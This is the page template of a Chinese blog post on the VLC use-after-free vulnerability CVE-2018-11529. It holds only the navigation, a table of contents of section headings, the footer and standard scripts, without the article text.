            <a class="level-item button is-link is-rounded" href="https://twitter.com/jon_tsang_" target="_blank">
                关注我</a>
        </div>
        
        
        
        <div class="level is-mobile">
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Github" href="https://github.com/JonTsang">
                
                <i class="fab fa-github"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Twitter" href="https://twitter.com/jon_tsang_">
                
                <i class="fab fa-twitter"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Instagram" href="https://www.instagram.com/jontsang_/">
                
                <i class="fab fa-instagram"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="RSS" href="/">
                
                <i class="fas fa-rss"></i>
                
            </a>
            
        </div>
        
    </div>
</div>
    
        

    <div class="card widget" id="toc">
        <div class="card-content">
            <div class="menu">
                <h3 class="menu-label">
                    目录
                </h3>
                <ul class="menu-list"><li>
        <a class="is-flex" href="#背景知识">
        <span class="has-mr-6">1</span>
        <span>背景知识</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#MKV">
        <span class="has-mr-6">1.1</span>
        <span>MKV</span>
        </a></li><li>
        <a class="is-flex" href="#视音频处理">
        <span class="has-mr-6">1.2</span>
        <span>视音频处理</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#分析环境">
        <span class="has-mr-6">2</span>
        <span>分析环境</span>
        </a></li><li>
        <a class="is-flex" href="#漏洞分析">
        <span class="has-mr-6">3</span>
        <span>漏洞分析</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#漏洞触发点">
        <span class="has-mr-6">3.1</span>
        <span>漏洞触发点</span>
        </a></li><li>
        <a class="is-flex" href="#确定UAF对象和其释放位置">
        <span class="has-mr-6">3.2</span>
        <span>确定UAF对象和其释放位置</span>
        </a></li><li>
        <a class="is-flex" href="#确定UAF对象重新分配的位置">
        <span class="has-mr-6">3.3</span>
        <span>确定UAF对象重新分配的位置</span>
        </a></li><li>
        <a class="is-flex" href="#确定UAF对象分配位置">
        <span class="has-mr-6">3.4</span>
        <span>确定UAF对象分配位置</span>
        </a></li><li>
        <a class="is-flex" href="#进一步证明分析">
        <span class="has-mr-6">3.5</span>
        <span>进一步证明分析</span>
        </a></li><li>
        <a class="is-flex" href="#漏洞成因">
        <span class="has-mr-6">3.6</span>
        <span>漏洞成因</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#漏洞利用">
        <span class="has-mr-6">4</span>
        <span>漏洞利用</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#Heap-Spray部署shellcode">
        <span class="has-mr-6">4.1</span>
        <span>Heap Spray部署shellcode</span>
        </a></li><li>
        <a class="is-flex" href="#构造UAF对象">
        <span class="has-mr-6">4.2</span>
        <span>构造UAF对象</span>
        </a></li><li>
        <a class="is-flex" href="#绕过-DEP-amp-ASLR">
        <span class="has-mr-6">4.3</span>
        <span>绕过 DEP&amp;ASLR</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#参考资料">
        <span class="has-mr-6">5</span>
        <span>参考资料</span>
        </a></li></ul>
            </div>
        </div>
    </div>

    
    
        <div class="column-right-shadow is-hidden-widescreen is-sticky">
        
        </div>
    
</div>

                
            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.png" alt="CVE-2018-11529——VLC Media Player UAF漏洞" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2019 Jon Tsang&nbsp;
                <!--Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>-->
                
                <br>
                <span id="busuanzi_container_site_uv">
                共<span id="busuanzi_value_site_uv">0</span>个访客
                </span>
                
                </p>
            </div>
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Download on GitHub" href="https://github.com/JonTsang">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>

<script>
var IcarusThemeSettings = {
    article: {
        highlight: {
            clipboard: true,
            fold: 'unfolded'
        }
    }
};
</script>


    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>



    
    
<script src="/js/animation.js"></script>

    
    
<script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
<script src="/js/gallery.js" defer></script>

    
    
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/" target="_blank" rel="noopener">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>

    
    <script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>
    
    
<a id="back-to-top" title="回到顶端" href="javascript:;" target="_blank" rel="noopener">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>

    
    
    
    
    
    
    
    
    
    
    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>